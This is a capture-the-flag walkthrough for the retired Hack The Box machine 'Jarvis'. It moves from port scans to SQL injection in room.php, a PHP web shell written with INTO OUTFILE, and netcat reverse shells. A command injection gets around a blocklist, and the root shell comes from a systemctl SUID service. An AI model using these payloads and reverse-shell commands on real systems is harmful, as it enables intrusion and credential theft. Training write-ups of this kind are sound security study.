HTB Walkthrough: Jarvis w/o Metasploit (retired)
Jarvis is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Jarvis| Difficulty Level: Medium | Operating System: Linux
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/Jarvis]
└─# nmap -sC -sV -oA Jarvis 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–21 17:49 EDT
Nmap scan report for 10.10.10.143
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀kali)-[/home/kali/labs/HTB/Jarvis]
└─# nmap -p- -Pn -oA Allports 10.10.10.143
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–21 17:50 EDT
Nmap scan report for 10.10.10.143
Host is up (0.095s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
64999/tcp open unknown
Browsing to http://10.10.10.143/ reveals a webpage. The page mentions ‘supersecurehotel.htb’ domain. Adding the same in /etc/hosts.
When you click on one of the room, the browser indicated ‘http://10.10.10.143/room.php?cod=1’. Trying SQLi and directory traversal, gives us same page with no image. Blind injection works. Also, it gives result for integer operations (e.g. 1=1, 1=2 without quotes)
Gives error: http://10.10.10.143/room.php?cod=1%20and%201=2
Returns image (no error): http://10.10.10.143/room.php?cod=1%20and%201=
Exploitation
Identify no. of columns: Since ‘order by 8’ returns page with no image, no. of columns are 7.
http://10.10.10.143/room.php?cod=1%20order%20by%208
Looking for valid injectable columns: http://10.10.10.143/room.php?cod=7 union select 1,2,3,4,5,6,7
The page returned 5,2,3,4 which will be the columns that can be injected.
Finding the valid user: http://10.10.10.143/room.php?cod=7 union select 1,user(),3,4,5,6,7
http://10.10.10.143/room.php?cod=7 union select 1,user(),database(),4,5,6,7
Output: DBadmin@localhosthttp:/10.10.10.143/room.php?cod=7 union select 1,table_name,database(),4,5,6,7 from information_schema.tables
Output: room
Reading files:
http://10.10.10.143/room.php?cod=0 union select 1, load_file(‘/etc/passwd’),3,4,5,6,7
Use ‘0’ in cod=0 to eliminate valid results from the query (in this case, valid rooms such as cod=1)
Getting reverse shell
Looking for document root to confirm directory to upload files. Default path for apache config is /etc/apache2/sites-enabled/000-default.conf
http://10.10.10.143/room.php?cod=0 union select 1, load_file(‘/etc/apache2/sites-enabled/000-default.conf’),3,4,5,6,7
We find that document root is: /var/www/html. Testing out if file can be uploaded.
http://10.10.10.143/room.php?cod=0 union select 1, load_file(‘/var/www/html/test.txt’),3,4,5,6,7 into OUTFILE ‘/var/www/html/test.txt’
Executing command:
(a) Copying the php code into test1.php
http://10.10.10.143/room.php?cod=0 union select 1, “<?php system($_GET[‘cmd’]); ?>”,3,4,5,6,7 into OUTFILE ‘/var/www/html/test1.php’
(b) Then execute below in another tab of the browser
http://10.10.10.143/test1.php?cmd=/bin/nc -e /bin/bash <Kali IP> 9876
c) Open a nc session in kali
And you will get a reverse shell. We need to escalate to user ‘pepper’ for user flag.
Privilege Escalation (www-date → pepper)
Running enumeration script (linpeas.sh)
[+] Checking ‘sudo -l’, /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
Examining simpler.py. As seen from below function, it is executing os.system() but checking for ‘forbidden’ characters.
def exec_ping():
forbidden = [‘&’, ‘;’, ‘-’, ‘`’, ‘||’, ‘|’]
command = input(‘Enter an IP: ‘)
for i in forbidden:
if i in command:
print(‘Got you’)
exit()
os.system(‘ping ‘ + command)
Trying command injection using characters other than forbidden ones. Exploiting the sudo -l exploit with user ‘pepper’.
www-data@jarvis:/dev/shm$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
<do -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************Enter an IP: $(whoami)
$(whoami)
ping: pepper: Temporary failure in name resolution
We cannot write shell script directly as it excludes few characters.
Enter an IP: $(nc -e /bin/bash <Kali IP> 9877)
$(nc -e /bin/bash <Kali IP>9877)
Got you
Let us write it in a script and execute(call) it via simpler.py. Open a nc session in another tab of kali.
www-data@jarvis:/tmp$ echo “nc -e /bin/bash <Kali IP> 9877” > test.sh
Note: Make sure you change permission of test.sh (chmod +x test.sh)
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(/tmp/test.sh)
And you will get reverse shell + user flag.
Privilege Escalation (pepper → root)
Running enumeration script (linpeas.sh)
root 384 0.8 1.6 61916 16520 ? Ss 18:40 0:16 python3 /root/sqli_defender.py
[+] SUID — Check easy privesc, exploits and write perms
-rwsr-x — — 1 root pepper 171K Feb 17 2019 /bin/systemctl
Systemctl controls the systemd. Looking for GTFObins: https://gtfobins.github.io/gtfobins/systemctl/
Following the SUID section. Creating all this in /home/pepper folder as /tmp was giving me errors. Also, open a nc session in kali in another tab.
cd /home/pepper
pepper@jarvis:~$ ls
ls
Web user.txt
pepper@jarvis:~$ echo ‘[Service]
echo ‘[Service]
> Type=oneshot
Type=oneshot
> ExecStart=/bin/bash -c “nc -e /bin/bash <Kali IP> 9890”
ExecStart=/bin/bash -c “nc -e /bin/bash <Kali IP> 9890”
> [Install]
[Install]
> WantedBy=multi-user.target’ > /home/pepper/test.service
WantedBy=multi-user.target’ > /home/pepper/test.service
pepper@jarvis:~$ systemctl link /home/pepper/test.service
systemctl link /home/pepper/test.service
Created symlink /etc/systemd/system/test.service -> /home/pepper/test.service.
pepper@jarvis:~$ systemctl enable — now /home/pepper/test.service
systemctl enable — now /home/pepper/test.service
Created symlink /etc/systemd/system/multi-user.target.wants/test.service -> /home/pepper/test.service.
You will get reverse shell + root flag.
